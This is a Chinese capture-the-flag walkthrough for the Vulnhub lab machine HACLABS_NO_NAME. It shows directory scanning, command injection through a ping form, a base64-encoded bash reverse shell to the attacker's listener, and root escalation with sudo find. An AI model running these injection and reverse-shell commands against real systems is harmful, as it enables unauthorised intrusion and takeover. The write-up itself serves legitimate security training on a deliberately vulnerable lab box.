Vulnhub靶机：HACLABS_ NO_NAME

介绍

系列： haclabs（此系列共3台）
发布日期：2020年2月15日
难度：初级-中级
Flag : 3个，每个Flag都存在与特定用户的家目录
学习：

• 目录扫描
• 命令执行
• find提权

靶机地址：https://www.vulnhub.com/entry/haclabs-no_name,429/

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说，出现“PCS Systemtechnik GmbH”就是靶机。

sudo netdiscover -i eth0 -r 192.168.124.0/24

主机信息探测

信息探测：nmap -A -p- 192.168.124.13，只开放了80端口

网站探测

访问80端口，就这德性。由于靶机没有开放22端口，大胆猜测应该是命令执行漏洞。

网站首页写着“假的管理员站点”，保守起见，还是先目录扫描一下，看看能不能找到真的管理员站点。

目录扫描

gobuster dir -u http://192.168.124.13/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100

普通的目录扫描，只发现了/admin，这个网站没啥用处，纯静态页面。换用大字典试试。可以用dirb或者gobuster调用此字典，个人感觉后者的性能会好一些
直接扫描，还是没扫出来新鲜的站点

gobuster dir -u http://192.168.124.13/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x php

加上-x php，检查php扩展的列表，发现了/superadmin.php

网站页面如下，看到“ping”查询时，已经基本确定是命令执行漏洞了。

命令执行

查看受限制的内容都是有哪些，使用命令：|cat superadmin.php

查看页面源代码

反弹shell

1. kali准备

对反弹shell的命令做base64编码
echo "bash -i >& /dev/tcp/192.168.124.10/9090 0>&1" | base64

开启nc监听
nc -nvlp 9090

2. 靶机准备

|echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4xMC85MDkwIDA+JjEK"|base64 -d|bash

Flag2

Flag1

拿到Flag1的时候，得知用户yash把用户haclabs的密码在某个隐藏文件中

搜寻隐藏文件

根据Flag1的提示，搜索属于用户yash的所有文件：find / -type f -user yash 2>/dev/null

提权-Flag3

经典find提权，拿到Flag3：sudo -u root find . -exec /bin/bash \; -quit

参考

haclabs: no_name walkthrough Vulnhub CTF